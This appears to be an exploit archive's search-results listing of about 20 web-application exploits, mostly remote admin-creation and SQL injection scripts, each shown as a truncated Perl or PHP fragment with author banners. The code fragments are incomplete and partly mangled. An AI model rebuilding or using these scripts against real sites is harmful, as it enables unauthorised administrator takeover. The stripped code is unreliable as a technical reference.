301 matches found
Pacific Timesheet 6.74 Cross Site Request Forgery
!--========================================================================================================= //\ /\ /\ /\ /\ /\ ///\ //\ /\ /\///\ // \ // //\ \ / //\ \ / // //\ \ /\\ \ \ \ / / / / // \ \ // // // // \ // //\ \\ \ // /// \ \ / \ / // / // / / / / / \ \ / / / ...
Infinity 2.0.5 Create Admin Exploit
?php printr' || || | || o,7 || . o7 || q||| o///, : / / . /QQQQQQQQQQQQQQQQQQQ\ q Infinity = 2.0.5 Create Admin /QQQ/\QQQ\ /QQQQQ/ \QQQQQQ\ q POST 3 /QQQQ/ QQQQ\ /QQQQ/ \QQQQ\ q Owned : |QQQQ/ By Qabandi \QQQQ| |QQQQ| |QQQQ| |QQQQ| From Kuwait, PEACE... |QQQQ| |QQQQ| |QQQQ| |QQQQ\ iqaahotmail.fr...
MyPicGallery 1.0 Arbitrary Add-Admin Exploit
No description provided by source. !/usr/bin/perl use strict; use LWP::UserAgent; print "-+-- MyPicGallery 1.0 Arbitrary Add-Admin Exploit --+-\n"; print "-+-- Discovered && Coded By: t0pP8uZz --+-\n"; print "-+-- Discovered On: 16 MAY 2008 / h4ck-y0u, milw0rm --+-\n"; print "-+-- MyPicGallery 1....
php168 v4.0SP 远程创建新管理员漏洞
No description provided by source...
Nukedit 4.9.x Remote Create Admin Exploit
No description provided by source. !/usr/bin/perl Title: Nukedit 4.9.x Create Admin Exploit Credit: r3dm0v3 http://r3dm0v3.persianblog.ir r3dm0v34tyahoodotcom Tehran - Iran &nb...
PHPKIT 1.6.4 PL1 2 XSRF Vulnerabilities
PHPKIT 1.6.4 PL1 2 XSRF Vulnerabilites founded by NBBN Vendor: http://www.phpkit.de/ PHPKIT sends in all link in the forum the sessionid via GET. So if an attacker send a link to a victim, for example in a private message, he have the sessionid if he filter the Referer: ?php $ref =...
phpkit-xsrf.txt
PHPKIT 1.6.4 PL1 2 XSRF Vulnerabilites founded by NBBN Vendor: http://www.phpkit.de/ PHPKIT sends in all link in the forum the sessionid via GET. So if an attacker send a link to a victim, for example in a private message, he have the sessionid if he filter the Referer: ::Vulnerabilites: There ar...
Invision Gallery <= 2.0.7 Remote SQL Injection Exploit
Exploit for unknown platform in category web applications ====================================================== Invision Gallery "r57ig207" ; $mw-geometry '420x510' ; $mw-resizable0,0; $mw-Label-text = '!', -font = 'Webdings 22'-pack; $mw-Label-text = 'Invision Gallery 'Verdana 7...
Flip 3.0 - Remote Admin Creation
!/usr/bin/perl use strict; use IO::Socket; use Getopt::Std; my $app = "Flip ; print "password you want: "; my $pass = ; chomp$user; chomp$pass; createadmin$url, $user, $pass; sub createadmin my $url = shift; my $user = shift; my $pass = shift; print "creating admin ... \t"; my $content =...
flip30-create.txt
!/usr/bin/perl use strict; use IO::Socket; use Getopt::Std; my $app = "Flip ; print "password you want: "; my $pass = ; chomp$user; chomp$pass; createadmin$url, $user, $pass; sub createadmin my $url = shift; my $user = shift; my $pass = shift; print "creating admin ... \t"; my $content =...
Flip <= 3.0 Remoe Admin Creation Exploit
Exploit for unknown platform in category web applications ======================================== Flip ; print "password you want: "; my $pass = ; chomp$user; chomp$pass; createadmin$url, $user, $pass; sub createadmin my $url = shift; my $user = shift; my $pass = shift; print "creating admin...
Flip 3.0 - Remote Admin Creation
Flip 3.0 - Remote Admin Creation !/usr/bin/perl use strict; use IO::Socket; use Getopt::Std; my $app = "Flip ; print "password you want: "; my $pass = ; chomp$user; chomp$pass; createadmin$url, $user, $pass; sub createadmin my $url = shift; my $user = shift; my $pass = shift; print "creating admi...
Flip <= 3.0 Remoe Admin Creation Exploit
No description provided by source. !/usr/bin/perl use strict; use IO::Socket; use Getopt::Std; my $app = "Flip = 3.0"; my $type = "Admin Creation"; my $author = "undefined1"; my $vendor = "http://sourceforge.net/projects/flipsource"; my %opt; getopts"t:", %opt; $| = 1; print ":: $app $type - by...
MyBulletinBoard (MyBB) <= 1.1.5 (CLIENT-IP) SQL Injection Exploit
No description provided by source. !/usr/bin/php -q -d shortopentag=on ? echo "MyBulletinBoard MyBB = 1.1.5 'CLIENT-IP' SQL injection / create new admin exploit\n"; echo "by rgod [email protected]\n"; echo "site: http://retrogod.altervista.org\n"; echo "dork, version specific: "Powered By MyBB"...
DeluxeBB 1.07 - Remote Create Admin
DeluxeBB 1.07 - Remote Create Admin !/usr/bin/perl DeluxeBB new or die; $cookiejar = HTTP::Cookies-new; $xpl-cookiejar $cookiejar ; $res = $xpl-post$url.'misc.php', Content = "sub" = "login", "name" = "$uname", "password" = "$passwd", "submit" = "Log-in", "redirect" = "", "expiry" = "990090909", ...
MiniNuke 2.x - SQL Injection (Add Admin)
MiniNuke 2.x - SQL Injection Add Admin !/usr/bin/perl Method found & Exploit scripted by nukedx Contacts ICQ: 10072 MSN/Main: [email protected] web: www.nukedx.com Original advisory: http://www.nukedx.com/?viewdoc=31 Usage: mini.pl use IO::Socket; if@ARGV != 5 usage; else exploit; sub header prin...
paNews 2.0b4 Remote Admin Creation SQL Injection Exploit
No description provided by source. / paNews v2.0b4 silePNEWSxpl This exploit utilize SQL injection for create a new user with admin privileges on paNews software system. References: packetstormsecurity.org/0503-exploits/panews.txt coded by: Silentium of Anacron Group Italy date: 04/03/2005 e-mail...
paNews 2.0b4 - Remote Admin Creation SQL Injection
/ paNews v2.0b4 silePNEWSxpl This exploit utilize SQL injection for create a new user with admin privileges on paNews software system. References: packetstormsecurity.org/0503-exploits/panews.txt coded by: Silentium of Anacron Group Italy date: 04/03/2005 e-mail: anacrongroupitalyatautisticidotor...
PHP-Nuke 7.4 - Privilege Escalation
PHP-Nuke 7.4 - Privilege Escalation A demonstration exploit HTTP form is provided: USERNAME: NOME: PASSWORD: E-MAIL: milw0rm.com 2004-09-08...
PHP-Nuke 7.4 - Privilege Escalation
A demonstration exploit HTTP form is provided: USERNAME: NOME: PASSWORD: E-MAIL: milw0rm.com 2004-09-08...